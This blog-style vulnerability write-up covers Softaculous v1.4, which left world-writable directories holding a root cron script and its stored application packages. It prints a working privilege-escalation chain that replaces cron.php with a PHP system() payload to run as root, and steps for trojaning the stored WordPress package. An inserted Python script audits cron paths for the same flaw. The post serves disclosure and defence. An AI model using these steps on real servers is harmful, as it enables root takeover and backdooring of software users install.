Finding bugs PT I - Softaculous gives up root

Good times with bad permissions


Sometimes the easiest way to find security flaws isn't by looking at the source, but by simply observing what an application does to the environment. For example, a few things to look for are:


We'll use Softaculous v1.4 as an example. Immediately after installing the software, you can check to see what's been recently updated on the filesystem:

[root@host ~]# find / ! -path "/proc/*" -a ! -path "/sys/*" -mmin -1 2>/dev/null


That command will find all files and directories which were last modified less than 1 minute ago (-mmin -1). It will not display any errors (file descriptor 2 - stderr, or standard error - is redirected to /dev/null), and will also not display information regarding the /proc and /sys directories. Increase the -mmin time as needed, depending on how long the install took.

One file that was created when Softaculous was installed was a cron job for the root user at /etc/cron.d/softaculous which contained this command:

/usr/bin/php /usr/local/cpanel/whostmgr/docroot/cgi/softaculous/cron.php >> /dev/null 2>&1


Note the path to the cron.php file, and now observe this:

[root@host ~]# find / -type d -perm 777 2>/dev/null
/usr/local/cpanel/whostmgr/docroot/cgi/softaculous
/usr/local/cpanel/whostmgr/docroot/cgi/softaculous/enduser
/usr/local/cpanel/whostmgr/docroot/cgi/softaculous/enduser/themes
/usr/local/cpanel/whostmgr/docroot/cgi/softaculous/enduser/themes/default
/usr/local/cpanel/whostmgr/docroot/cgi/softaculous/enduser/themes/default/js
/usr/local/cpanel/whostmgr/docroot/cgi/softaculous/enduser/themes/default/admin
/usr/local/cpanel/whostmgr/docroot/cgi/softaculous/enduser/themes/default/images
/usr/local/cpanel/whostmgr/docroot/cgi/softaculous/enduser/themes/default/images/admin
/usr/local/cpanel/whostmgr/docroot/cgi/softaculous/enduser/main
/usr/local/cpanel/whostmgr/docroot/cgi/softaculous/enduser/main/functions
/usr/local/cpanel/whostmgr/docroot/cgi/softaculous/enduser/main/admin
/usr/local/cpanel/whostmgr/docroot/cgi/softaculous/enduser/main/classes
/usr/local/cpanel/whostmgr/docroot/cgi/softaculous/enduser/languages
/usr/local/cpanel/whostmgr/docroot/cgi/softaculous/enduser/languages/english
/usr/local/cpanel/whostmgr/docroot/cgi/softaculous/enduser/languages/english/admin
/usr/local/cpanel/whostmgr/docroot/cgi/softaculous/enduser/languages/spanish
/usr/local/cpanel/whostmgr/docroot/cgi/softaculous/enduser/languages/spanish/admin
/usr/local/cpanel/whostmgr/docroot/cgi/softaculous/enduser/softimages
/etc/cron.d
/var/softaculous

Yes, even /etc/cron.d.


The "find" command shown above searched the entire filesystem for any directories (-type d) with permissions of 0777. The first directory that was found was /usr/local/cpanel/whostmgr/docroot/cgi/softaculous, which is the same directory where the cron.php file is.


That is a devastating problem, because it allows anyone who can write to the filesystem to easily obtain root privileges. This isn't much different from a kernel vulnerability, in the sense that just one remotely exploitable PHP script on your server can lead to someone getting root. Consider the fact that Softaculous, just like Fantastico and Installatron, is basically a delivery system for PHP applications which are all but guaranteed to be exploitable.


To demonstrate how this can be a problem, run these commands as root:

[root@host ~]# mkdir /home/testing
[root@host ~]# chmod 777 /home/testing
[root@host ~]# echo testing > /home/testing/test


There should now be a world writable directory at /home/testing which contains a file called test, owned by root. Next, run these commands as an unprivileged (i.e. non-root) user:

[user@host ~]$ cd /home/testing
[user@host /home/testing]$ mv test test.old
[user@host /home/testing]$ touch test
[user@host /home/testing]$ rm -f test.old


Notice how the file test could be renamed by a user other than its owner (root), from within a directory which did not belong to that user. The non-root user was also able to create a file of the same name in its place, and even remove the original file. This works because renaming and unlinking are governed by the permissions of the containing directory, not of the file itself (unless the directory has the sticky bit set, as /tmp does).


Getting back to Softaculous, all we need to do is take similar actions against the cron.php file, then wait for the Softaculous cron job to run. Since the cron job runs as root, we can effectively execute whatever commands we want.

[user@host ~]$ cd /usr/local/cpanel/whostmgr/docroot/cgi/softaculous
[user@host /usr/local/cpanel/whostmgr/docroot/cgi/softaculous]$ mv cron.php{,.orig}
[user@host /usr/local/cpanel/whostmgr/docroot/cgi/softaculous]$ cat > cron.php << EOF
<?php system("id > /home/user/outfile"); ?>
EOF


After the cron job has been run:

[user@host ~]$ ls -l outfile
-rw-r--r-- 1 root root 88 Jun 15 16:16 outfile
[user@host ~]$ cat outfile
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)


This issue was addressed in Softaculous v1.5, which was released a short time later. But, due to another bug, this actually wasn't exploitable by default. Check the cron log (pretend this is all 1 line):

Jun 15 16:19:01 host crond[26393]: (root) CMD
(/usr/bin/php /usr/local/cpanel/whostmgr/docroot/cgi/softaculous/cron.php >> /dev/null 2>&1^M)

Did you see the problem? A stray carriage return (the ^M shown above) existed at the end of the cron file, causing the cron job to never actually run properly. This too was addressed in Softaculous v1.5.
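The two checks this post makes by hand (a root cron job whose script lives under a 0777 directory, and a stray carriage return in the cron entry) can be automated. The following audit script is an added example, not part of the original post or of Softaculous: it parses lines in /etc/cron.d format, walks every absolute path the command references, and reports any ancestor directory that is world-writable without the sticky bit. The demo builds a constructed temp layout mirroring the Softaculous one.

```python
import os
import re
import stat
import tempfile

# /etc/cron.d format: minute hour dom month dow user command
CRON_D_LINE = re.compile(r"^\s*(?:\S+\s+){5}(\S+)\s+(.+)$")
ABS_PATH = re.compile(r"/[^\s;|&>'\"]+")


def unsafe_ancestors(path):
    """Directories on the way to `path` (including `path` itself) that are
    world-writable and lack the sticky bit: any local user can rename or
    replace entries in them, which is exactly the cron.php problem above."""
    found = []
    p = os.path.abspath(path)
    while True:
        try:
            st = os.stat(p)
        except FileNotFoundError:
            st = None  # missing component; its parents still matter
        if st and stat.S_ISDIR(st.st_mode):
            if (st.st_mode & stat.S_IWOTH) and not (st.st_mode & stat.S_ISVTX):
                found.append(p)
        parent = os.path.dirname(p)
        if parent == p:
            return found
        p = parent


def audit_cron_line(line):
    """Return a list of findings for one cron.d line (empty means clean)."""
    findings = []
    if not line.strip() or line.lstrip().startswith("#"):
        return findings
    if "\r" in line:
        findings.append("stray carriage return (^M) in cron entry")
    m = CRON_D_LINE.match(line.rstrip("\r\n"))
    if not m:
        return findings
    user, command = m.group(1), m.group(2)
    for path in ABS_PATH.findall(command):
        if path == "/dev/null":
            continue
        for d in unsafe_ancestors(path):
            findings.append(f"{user} job uses {path}: {d} is world-writable without sticky bit")
    return findings


def demo():
    """Constructed layout: cron.php under a 0777 directory, entry ending in CR."""
    root = tempfile.mkdtemp()
    cgi = os.path.join(root, "cgi", "softaculous")
    os.makedirs(cgi)
    open(os.path.join(cgi, "cron.php"), "w").close()
    os.chmod(cgi, 0o777)  # the bad permission from the post
    line = f"*/5 * * * * root /usr/bin/php {cgi}/cron.php >> /dev/null 2>&1\r\n"
    return audit_cron_line(line)
```

Run `audit_cron_line` over each line of every file in /etc/cron.d to get the same picture the manual find commands gave, in one pass.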


A very real issue that did exist, however, was the ability for any local user to backdoor the various packages that Softaculous installed. Check the output from the find command above, where we looked for any world writable directories. The last directory found was /var/softaculous which is where all the packages (WordPress, phpBB, etc) are stored. Again, because of the bad permissions, any local user could wander into that directory and rename or remove anything inside, then create their own directory of the same name and populate it with their own (backdoored) files:

[user@host ~]$ cd /var/softaculous
[user@host /var/softaculous]$ mv wordpress{,.orig}
[user@host /var/softaculous]$ mkdir wordpress
[user@host /var/softaculous]$ cd wordpress
[user@host /var/softaculous/wordpress]$ vi index.php # insert malicious code, etc
[user@host /var/softaculous/wordpress]$ # copy the rest of the files over


Then once users installed WordPress via Softaculous, they would get the trojaned files.